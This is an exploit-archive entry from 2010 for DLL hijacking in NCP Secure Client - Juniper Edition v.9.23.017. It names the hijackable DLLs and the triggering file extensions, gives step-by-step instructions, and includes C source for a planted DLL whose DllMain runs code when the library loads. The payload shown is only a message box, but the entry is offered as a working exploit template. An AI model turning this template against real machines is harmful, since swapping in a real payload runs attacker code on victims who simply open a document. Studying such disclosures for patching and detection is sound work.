NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit

2010-09-14T00:00:00
ID 1337DAY-ID-14074
Type zdt
Reporter secuid0
Modified 2010-09-14T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ====================================================================
NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit
====================================================================

/*
Exploit Title: NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit (dvccsabase002.dll, conman.dll, kmpapi32.dll)
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: NCP Secure Client - Juniper Edition v.9.23.017
Vendor Site: http://www.ncp-e.com/
Download URL: http://www.ncp-e.com/en/downloadstatistik/secure-entry-client/ncp-secure-client-juniper-edition.html
Vulnerable Extensions: pcf, spd, wge, wgx
Tested Under: winxp_sp3.080413-2111

Instructions: 
1. Compile the following code
2. Create a file of the affected extensions in the same directory as the dll
3. Execute file.<extension>
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

int m0nk()
{
	MessageBox(0, "NCP Secure Client - Juniper Edition v.9.23.017 is vulnerable to DLL Hijacking", "secuid0", MB_OK);
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD m0nk_call,LPVOID lpReserved)
{
	switch (m0nk_call)
	{
	case DLL_PROCESS_ATTACH:
		m0nk();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}



#  0day.today [2018-01-06]  #